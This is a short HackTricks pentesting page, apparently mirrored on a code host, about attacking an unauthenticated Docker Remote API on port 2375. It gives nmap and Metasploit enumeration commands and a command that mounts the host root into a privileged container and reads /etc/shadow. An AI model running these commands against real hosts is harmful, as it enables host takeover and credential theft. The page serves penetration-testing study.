coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
045649c4ab
hacktricks/pentesting/2375-pentesting-docker.md
CPol faf77aef23
GitBook: [master] 2 pages modified
2020-12-15 09:18:43 +00:00

985 B
Raw Blame History

2375 Pentesting Docker

2375 - Pentesting Docker API

Basic Information

Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / root directory to the container and read/write files of the hosts environment.

Default port: 2375

PORT    STATE SERVICE
2375/tcp open  docker

Enumeration

msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>

Exploitation

Check if its vulnerable to execute arbitrary code:

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow